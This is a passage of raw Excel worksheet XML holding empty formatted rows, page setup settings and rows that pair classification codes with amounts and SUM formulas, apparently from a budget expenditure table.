      <c r="C249" s="750"/>
      <c r="D249" s="750"/>
    </row>
    <row r="250" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B250" s="750"/>
      <c r="C250" s="750"/>
      <c r="D250" s="750"/>
    </row>
    <row r="251" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B251" s="750"/>
      <c r="C251" s="750"/>
      <c r="D251" s="750"/>
    </row>
    <row r="252" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B252" s="750"/>
      <c r="C252" s="750"/>
      <c r="D252" s="750"/>
    </row>
    <row r="253" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B253" s="750"/>
      <c r="C253" s="750"/>
      <c r="D253" s="750"/>
    </row>
    <row r="254" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B254" s="750"/>
      <c r="C254" s="750"/>
      <c r="D254" s="750"/>
    </row>
    <row r="255" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B255" s="750"/>
      <c r="C255" s="750"/>
      <c r="D255" s="750"/>
    </row>
    <row r="256" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B256" s="750"/>
      <c r="C256" s="750"/>
      <c r="D256" s="750"/>
    </row>
    <row r="257" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B257" s="750"/>
      <c r="C257" s="750"/>
      <c r="D257" s="750"/>
    </row>
    <row r="258" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B258" s="750"/>
      <c r="C258" s="750"/>
      <c r="D258" s="750"/>
    </row>
    <row r="259" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B259" s="750"/>
      <c r="C259" s="750"/>
      <c r="D259" s="750"/>
    </row>
    <row r="260" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B260" s="750"/>
      <c r="C260" s="750"/>
      <c r="D260" s="750"/>
    </row>
    <row r="261" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B261" s="750"/>
      <c r="C261" s="750"/>
      <c r="D261" s="750"/>
    </row>
    <row r="262" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B262" s="750"/>
      <c r="C262" s="750"/>
      <c r="D262" s="750"/>
    </row>
    <row r="263" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B263" s="750"/>
      <c r="C263" s="750"/>
      <c r="D263" s="750"/>
    </row>
    <row r="264" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B264" s="750"/>
      <c r="C264" s="750"/>
      <c r="D264" s="750"/>
    </row>
    <row r="265" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B265" s="750"/>
      <c r="C265" s="750"/>
      <c r="D265" s="750"/>
    </row>
    <row r="266" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B266" s="750"/>
      <c r="C266" s="750"/>
      <c r="D266" s="750"/>
    </row>
    <row r="267" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B267" s="750"/>
      <c r="C267" s="750"/>
      <c r="D267" s="750"/>
    </row>
    <row r="268" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B268" s="750"/>
      <c r="C268" s="750"/>
      <c r="D268" s="750"/>
    </row>
    <row r="269" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B269" s="750"/>
      <c r="C269" s="750"/>
      <c r="D269" s="750"/>
    </row>
    <row r="270" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B270" s="750"/>
      <c r="C270" s="750"/>
      <c r="D270" s="750"/>
    </row>
    <row r="271" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B271" s="750"/>
      <c r="C271" s="750"/>
      <c r="D271" s="750"/>
    </row>
    <row r="272" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B272" s="750"/>
      <c r="C272" s="750"/>
      <c r="D272" s="750"/>
    </row>
    <row r="273" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B273" s="750"/>
      <c r="C273" s="750"/>
      <c r="D273" s="750"/>
    </row>
    <row r="274" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B274" s="750"/>
      <c r="C274" s="750"/>
      <c r="D274" s="750"/>
    </row>
    <row r="275" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B275" s="750"/>
      <c r="C275" s="750"/>
      <c r="D275" s="750"/>
    </row>
    <row r="276" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B276" s="750"/>
      <c r="C276" s="750"/>
      <c r="D276" s="750"/>
    </row>
    <row r="277" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B277" s="750"/>
      <c r="C277" s="750"/>
      <c r="D277" s="750"/>
    </row>
    <row r="278" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B278" s="750"/>
      <c r="C278" s="750"/>
      <c r="D278" s="750"/>
    </row>
    <row r="279" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B279" s="750"/>
      <c r="C279" s="750"/>
      <c r="D279" s="750"/>
    </row>
    <row r="280" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B280" s="750"/>
      <c r="C280" s="750"/>
      <c r="D280" s="750"/>
    </row>
    <row r="281" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B281" s="750"/>
      <c r="C281" s="750"/>
      <c r="D281" s="750"/>
    </row>
    <row r="282" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B282" s="750"/>
      <c r="C282" s="750"/>
      <c r="D282" s="750"/>
    </row>
    <row r="283" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B283" s="750"/>
      <c r="C283" s="750"/>
      <c r="D283" s="750"/>
    </row>
    <row r="284" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B284" s="750"/>
      <c r="C284" s="750"/>
      <c r="D284" s="750"/>
    </row>
    <row r="285" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B285" s="750"/>
      <c r="C285" s="750"/>
      <c r="D285" s="750"/>
    </row>
    <row r="286" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B286" s="750"/>
      <c r="C286" s="750"/>
      <c r="D286" s="750"/>
    </row>
    <row r="287" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B287" s="750"/>
      <c r="C287" s="750"/>
      <c r="D287" s="750"/>
    </row>
    <row r="288" s="714" customFormat="1" customHeight="1" spans="2:4">
      <c r="B288" s="750"/>
      <c r="C288" s="750"/>
      <c r="D288" s="750"/>
    </row>
    <row r="289" s="714" customFormat="1" customHeight="1" spans="1:4">
      <c r="A289" s="719"/>
      <c r="B289" s="720"/>
      <c r="C289" s="720"/>
      <c r="D289" s="720"/>
    </row>
    <row r="290" s="714" customFormat="1" customHeight="1" spans="1:4">
      <c r="A290" s="719"/>
      <c r="B290" s="720"/>
      <c r="C290" s="720"/>
      <c r="D290" s="720"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="B3:D3"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.59" right="0.59" top="0.79" bottom="0.79" header="0.31" footer="0.31"/>
  <pageSetup paperSize="9" scale="97" fitToHeight="0" orientation="portrait" useFirstPageNumber="1" errors="NA"/>
  <headerFooter alignWithMargins="0"/>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6"/>
  </sheetPr>
  <dimension ref="A1:C1323"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="6" topLeftCell="C1298" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="I4" sqref="I4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.84259259259259" defaultRowHeight="13.2" outlineLevelCol="2"/>
  <cols>
    <col min="1" max="1" width="11.7222222222222" style="652" customWidth="1"/>
    <col min="2" max="2" width="54.1481481481481" style="652" customWidth="1"/>
    <col min="3" max="3" width="15.7222222222222" style="695" customWidth="1"/>
    <col min="4" max="16384" width="8.84259259259259" style="696"/>
  </cols>
  <sheetData>
    <row r="1" ht="20.1" customHeight="1" spans="1:3">
      <c r="A1" s="697" t="s">
        <v>950</v>
      </c>
      <c r="B1" s="698"/>
      <c r="C1" s="699"/>
    </row>
    <row r="2" ht="54.95" customHeight="1" spans="1:3">
      <c r="A2" s="398" t="s">
        <v>951</v>
      </c>
      <c r="B2" s="398"/>
      <c r="C2" s="626"/>
    </row>
    <row r="3" ht="18.95" customHeight="1" spans="1:3">
      <c r="A3" s="700"/>
      <c r="B3" s="700"/>
      <c r="C3" s="701" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" s="692" customFormat="1" ht="24.95" customHeight="1" spans="1:3">
      <c r="A4" s="702" t="s">
        <v>952</v>
      </c>
      <c r="B4" s="703" t="s">
        <v>953</v>
      </c>
      <c r="C4" s="704" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5" s="693" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A5" s="705">
        <v>201</v>
      </c>
      <c r="B5" s="706" t="s">
        <v>954</v>
      </c>
      <c r="C5" s="269">
        <v>33072</v>
      </c>
    </row>
    <row r="6" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A6" s="705">
        <v>20101</v>
      </c>
      <c r="B6" s="706" t="s">
        <v>955</v>
      </c>
      <c r="C6" s="269">
        <f>SUM(C7:C17)</f>
        <v>773</v>
      </c>
    </row>
    <row r="7" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A7" s="705">
        <v>2010101</v>
      </c>
      <c r="B7" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C7" s="707">
        <v>700</v>
      </c>
    </row>
    <row r="8" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A8" s="705">
        <v>2010102</v>
      </c>
      <c r="B8" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C8" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="9" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A9" s="705">
        <v>2010103</v>
      </c>
      <c r="B9" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C9" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="10" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A10" s="705">
        <v>2010104</v>
      </c>
      <c r="B10" s="705" t="s">
        <v>959</v>
      </c>
      <c r="C10" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="11" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A11" s="705">
        <v>2010105</v>
      </c>
      <c r="B11" s="705" t="s">
        <v>960</v>
      </c>
      <c r="C11" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="12" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A12" s="705">
        <v>2010106</v>
      </c>
      <c r="B12" s="705" t="s">
        <v>961</v>
      </c>
      <c r="C12" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="13" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A13" s="705">
        <v>2010107</v>
      </c>
      <c r="B13" s="705" t="s">
        <v>962</v>
      </c>
      <c r="C13" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="14" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A14" s="705">
        <v>2010108</v>
      </c>
      <c r="B14" s="705" t="s">
        <v>963</v>
      </c>
      <c r="C14" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="15" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A15" s="705">
        <v>2010109</v>
      </c>
      <c r="B15" s="705" t="s">
        <v>964</v>
      </c>
      <c r="C15" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="16" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A16" s="705">
        <v>2010150</v>
      </c>
      <c r="B16" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C16" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="17" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A17" s="705">
        <v>2010199</v>
      </c>
      <c r="B17" s="705" t="s">
        <v>966</v>
      </c>
      <c r="C17" s="707">
        <v>73</v>
      </c>
    </row>
    <row r="18" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A18" s="705">
        <v>20102</v>
      </c>
      <c r="B18" s="706" t="s">
        <v>967</v>
      </c>
      <c r="C18" s="269">
        <f>SUM(C19:C26)</f>
        <v>463</v>
      </c>
    </row>
    <row r="19" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A19" s="705">
        <v>2010201</v>
      </c>
      <c r="B19" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C19" s="707">
        <v>430</v>
      </c>
    </row>
    <row r="20" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A20" s="705">
        <v>2010202</v>
      </c>
      <c r="B20" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C20" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="21" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A21" s="705">
        <v>2010203</v>
      </c>
      <c r="B21" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C21" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="22" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A22" s="705">
        <v>2010204</v>
      </c>
      <c r="B22" s="705" t="s">
        <v>968</v>
      </c>
      <c r="C22" s="707">
        <v>10</v>
      </c>
    </row>
    <row r="23" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A23" s="705">
        <v>2010205</v>
      </c>
      <c r="B23" s="705" t="s">
        <v>969</v>
      </c>
      <c r="C23" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="24" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A24" s="705">
        <v>2010206</v>
      </c>
      <c r="B24" s="705" t="s">
        <v>970</v>
      </c>
      <c r="C24" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="25" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A25" s="705">
        <v>2010250</v>
      </c>
      <c r="B25" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C25" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="26" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A26" s="705">
        <v>2010299</v>
      </c>
      <c r="B26" s="705" t="s">
        <v>971</v>
      </c>
      <c r="C26" s="707">
        <v>23</v>
      </c>
    </row>
    <row r="27" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A27" s="705">
        <v>20103</v>
      </c>
      <c r="B27" s="706" t="s">
        <v>972</v>
      </c>
      <c r="C27" s="269">
        <f>SUM(C28:C37)</f>
        <v>15497</v>
      </c>
    </row>
    <row r="28" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A28" s="705">
        <v>2010301</v>
      </c>
      <c r="B28" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C28" s="707">
        <v>14500</v>
      </c>
    </row>
    <row r="29" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A29" s="705">
        <v>2010302</v>
      </c>
      <c r="B29" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C29" s="707">
        <v>400</v>
      </c>
    </row>
    <row r="30" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A30" s="705">
        <v>2010303</v>
      </c>
      <c r="B30" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C30" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="31" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A31" s="705">
        <v>2010304</v>
      </c>
      <c r="B31" s="705" t="s">
        <v>973</v>
      </c>
      <c r="C31" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="32" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A32" s="705">
        <v>2010305</v>
      </c>
      <c r="B32" s="705" t="s">
        <v>974</v>
      </c>
      <c r="C32" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="33" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A33" s="705">
        <v>2010306</v>
      </c>
      <c r="B33" s="705" t="s">
        <v>975</v>
      </c>
      <c r="C33" s="707">
        <v>150</v>
      </c>
    </row>
    <row r="34" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A34" s="705">
        <v>2010308</v>
      </c>
      <c r="B34" s="705" t="s">
        <v>976</v>
      </c>
      <c r="C34" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="35" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A35" s="705">
        <v>2010309</v>
      </c>
      <c r="B35" s="705" t="s">
        <v>977</v>
      </c>
      <c r="C35" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="36" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A36" s="705">
        <v>2010350</v>
      </c>
      <c r="B36" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C36" s="707">
        <v>144</v>
      </c>
    </row>
    <row r="37" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A37" s="705">
        <v>2010399</v>
      </c>
      <c r="B37" s="705" t="s">
        <v>978</v>
      </c>
      <c r="C37" s="707">
        <v>303</v>
      </c>
    </row>
    <row r="38" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A38" s="705">
        <v>20104</v>
      </c>
      <c r="B38" s="706" t="s">
        <v>979</v>
      </c>
      <c r="C38" s="269">
        <f>SUM(C39:C48)</f>
        <v>875</v>
      </c>
    </row>
    <row r="39" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A39" s="705">
        <v>2010401</v>
      </c>
      <c r="B39" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C39" s="707">
        <v>871</v>
      </c>
    </row>
    <row r="40" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A40" s="705">
        <v>2010402</v>
      </c>
      <c r="B40" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C40" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="41" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A41" s="705">
        <v>2010403</v>
      </c>
      <c r="B41" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C41" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="42" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A42" s="705">
        <v>2010404</v>
      </c>
      <c r="B42" s="705" t="s">
        <v>980</v>
      </c>
      <c r="C42" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="43" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A43" s="705">
        <v>2010405</v>
      </c>
      <c r="B43" s="705" t="s">
        <v>981</v>
      </c>
      <c r="C43" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="44" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A44" s="705">
        <v>2010406</v>
      </c>
      <c r="B44" s="705" t="s">
        <v>982</v>
      </c>
      <c r="C44" s="707">
        <v>4</v>
      </c>
    </row>
    <row r="45" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A45" s="705">
        <v>2010407</v>
      </c>
      <c r="B45" s="705" t="s">
        <v>983</v>
      </c>
      <c r="C45" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="46" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A46" s="705">
        <v>2010408</v>
      </c>
      <c r="B46" s="705" t="s">
        <v>984</v>
      </c>
      <c r="C46" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="47" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A47" s="705">
        <v>2010450</v>
      </c>
      <c r="B47" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C47" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="48" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A48" s="705">
        <v>2010499</v>
      </c>
      <c r="B48" s="705" t="s">
        <v>985</v>
      </c>
      <c r="C48" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="49" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A49" s="705">
        <v>20105</v>
      </c>
      <c r="B49" s="706" t="s">
        <v>986</v>
      </c>
      <c r="C49" s="269">
        <f>SUM(C50:C59)</f>
        <v>297</v>
      </c>
    </row>
    <row r="50" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A50" s="705">
        <v>2010501</v>
      </c>
      <c r="B50" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C50" s="707">
        <v>250</v>
      </c>
    </row>
    <row r="51" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A51" s="705">
        <v>2010502</v>
      </c>
      <c r="B51" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C51" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="52" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A52" s="705">
        <v>2010503</v>
      </c>
      <c r="B52" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C52" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="53" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A53" s="705">
        <v>2010504</v>
      </c>
      <c r="B53" s="705" t="s">
        <v>987</v>
      </c>
      <c r="C53" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="54" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A54" s="705">
        <v>2010505</v>
      </c>
      <c r="B54" s="705" t="s">
        <v>988</v>
      </c>
      <c r="C54" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="55" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A55" s="705">
        <v>2010506</v>
      </c>
      <c r="B55" s="705" t="s">
        <v>989</v>
      </c>
      <c r="C55" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="56" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A56" s="705">
        <v>2010507</v>
      </c>
      <c r="B56" s="705" t="s">
        <v>990</v>
      </c>
      <c r="C56" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="57" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A57" s="705">
        <v>2010508</v>
      </c>
      <c r="B57" s="705" t="s">
        <v>991</v>
      </c>
      <c r="C57" s="707">
        <v>42</v>
      </c>
    </row>
    <row r="58" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A58" s="705">
        <v>2010550</v>
      </c>
      <c r="B58" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C58" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="59" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A59" s="705">
        <v>2010599</v>
      </c>
      <c r="B59" s="705" t="s">
        <v>992</v>
      </c>
      <c r="C59" s="707">
        <v>5</v>
      </c>
    </row>
    <row r="60" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A60" s="705">
        <v>20106</v>
      </c>
      <c r="B60" s="706" t="s">
        <v>993</v>
      </c>
      <c r="C60" s="269">
        <f>SUM(C61:C70)</f>
        <v>1149</v>
      </c>
    </row>
    <row r="61" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A61" s="705">
        <v>2010601</v>
      </c>
      <c r="B61" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C61" s="707">
        <v>1129</v>
      </c>
    </row>
    <row r="62" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A62" s="705">
        <v>2010602</v>
      </c>
      <c r="B62" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C62" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="63" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A63" s="705">
        <v>2010603</v>
      </c>
      <c r="B63" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C63" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="64" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A64" s="705">
        <v>2010604</v>
      </c>
      <c r="B64" s="705" t="s">
        <v>994</v>
      </c>
      <c r="C64" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="65" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A65" s="705">
        <v>2010605</v>
      </c>
      <c r="B65" s="705" t="s">
        <v>995</v>
      </c>
      <c r="C65" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="66" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A66" s="705">
        <v>2010606</v>
      </c>
      <c r="B66" s="705" t="s">
        <v>996</v>
      </c>
      <c r="C66" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="67" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A67" s="705">
        <v>2010607</v>
      </c>
      <c r="B67" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C67" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="68" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A68" s="705">
        <v>2010608</v>
      </c>
      <c r="B68" s="705" t="s">
        <v>998</v>
      </c>
      <c r="C68" s="707">
        <v>11</v>
      </c>
    </row>
    <row r="69" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A69" s="705">
        <v>2010650</v>
      </c>
      <c r="B69" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C69" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="70" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A70" s="705">
        <v>2010699</v>
      </c>
      <c r="B70" s="705" t="s">
        <v>999</v>
      </c>
      <c r="C70" s="707">
        <v>9</v>
      </c>
    </row>
    <row r="71" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A71" s="705">
        <v>20107</v>
      </c>
      <c r="B71" s="706" t="s">
        <v>1000</v>
      </c>
      <c r="C71" s="269">
        <f>SUM(C72:C78)</f>
        <v>1254</v>
      </c>
    </row>
    <row r="72" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A72" s="705">
        <v>2010701</v>
      </c>
      <c r="B72" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C72" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="73" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A73" s="705">
        <v>2010702</v>
      </c>
      <c r="B73" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C73" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="74" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A74" s="705">
        <v>2010703</v>
      </c>
      <c r="B74" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C74" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="75" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A75" s="705">
        <v>2010709</v>
      </c>
      <c r="B75" s="705" t="s">
        <v>997</v>
      </c>
      <c r="C75" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="76" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A76" s="705">
        <v>2010710</v>
      </c>
      <c r="B76" s="705" t="s">
        <v>1001</v>
      </c>
      <c r="C76" s="707">
        <v>1154</v>
      </c>
    </row>
    <row r="77" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A77" s="705">
        <v>2010750</v>
      </c>
      <c r="B77" s="705" t="s">
        <v>965</v>
      </c>
      <c r="C77" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="78" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A78" s="705">
        <v>2010799</v>
      </c>
      <c r="B78" s="705" t="s">
        <v>1002</v>
      </c>
      <c r="C78" s="707">
        <v>100</v>
      </c>
    </row>
    <row r="79" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A79" s="705">
        <v>20108</v>
      </c>
      <c r="B79" s="706" t="s">
        <v>1003</v>
      </c>
      <c r="C79" s="269">
        <v>442</v>
      </c>
    </row>
    <row r="80" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A80" s="705">
        <v>2010801</v>
      </c>
      <c r="B80" s="705" t="s">
        <v>956</v>
      </c>
      <c r="C80" s="707">
        <v>442</v>
      </c>
    </row>
    <row r="81" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A81" s="705">
        <v>2010802</v>
      </c>
      <c r="B81" s="705" t="s">
        <v>957</v>
      </c>
      <c r="C81" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="82" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A82" s="705">
        <v>2010803</v>
      </c>
      <c r="B82" s="705" t="s">
        <v>958</v>
      </c>
      <c r="C82" s="707">
        <v>0</v>
      </c>
    </row>
    <row r="83" s="694" customFormat="1" ht="17.1" customHeight="1" spans="1:3">
      <c r="A83" s="705">
        <v>2010804</v>
      </c>
